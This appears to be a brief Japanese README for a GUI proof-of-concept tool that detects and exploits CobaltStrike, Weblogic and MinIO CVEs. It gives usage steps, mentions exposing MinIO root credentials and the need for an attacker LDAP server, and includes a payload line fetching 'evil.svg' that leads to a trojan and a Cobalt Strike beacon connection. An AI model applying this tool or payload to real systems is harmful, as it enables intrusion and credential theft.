
CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 のテストツール
A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
これら3つの脆弱性のグラフィカルな脆弱性検出および悪用ツール
java -jar Gui-poc-test.jar
使用方法:「検出」と「悪用」の2つのボタンがあります。脆弱性ごとに異なる使用方法はツールインターフェースにヒントが表示されます。
ターゲットを入力し、ポートはデフォルト9000(変更可能、ソースコードGuiDemo.java:line144参照)
MINIO_ROOT_USERやMINIO_ROOT_PASSWORDなどを表示
ターゲットのIP、ポート、LDAPサーバーアドレスを入力
検出:
注意:脆弱性の悪用には自分でLDAPサーバー(パブリックネットワーク)を構築する必要があります

ペイロード例:
beacon.exe http://127.0.0.1:4444/evil.svg
実現結果:Windowsでトロイの木馬を実行し、Mac上のCSクライアントが接続される
同時にCS側でJarファイルの内容が実行され、電卓が表示される

WindowsでCSへのアクセスアドレスが記録される
